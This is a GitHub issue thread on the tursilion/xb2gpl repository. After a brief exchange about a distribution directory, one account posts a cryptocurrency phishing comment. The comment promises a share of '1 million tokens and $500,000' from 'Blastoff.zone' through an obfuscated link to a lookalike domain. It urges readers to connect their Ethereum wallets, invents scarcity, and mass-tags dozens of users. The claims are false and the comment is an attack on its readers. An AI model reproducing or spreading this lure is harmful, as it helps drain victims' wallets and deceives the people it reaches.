### ISSUE TITLE
Dist

### ISSUE THREAD

**Issue by polluks** [tursilion/xb2gpl#1]
You should not add a distribution directory.
Thanks for this repo.

**Comment by tursilion** [comment]
A distribution directory is how my webpage works, but thanks for your thoughts.

**Comment by polluks** [comment]
I see

**Comment by ldsys** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
boolking, @jerolimov, @twose, @rbj325, @Dayananda87, @herrernst, @jdarling, @moshiba, @rohitgupta1694, @ksvikram, @sunflash, @jcru, @leonklingele, @leftbrainstrain, @mahmoudkandeel, @DavidLiuXh, @Erghel, @svzdvd, @eugeneteo, @roscopecoltran, @dipankar, @jolby, @hirooooooo, @malinengineer, @mjacquote2, @NguyenTrungTin, @maumaugithub, @sorryeh, @benguillet, @kornholi, @dobestan, @sel, @romansil, @Kahn, @jht5945, @akatrevorjay, @lgmontenegro, @cedric05, @rphillips, @oligot, @neersighted, @lemon-li, @giokob, @bosturbo, @itomsawyer, @chadchabot, @tianye9987, @kouky, @zaa, @kevinsegal
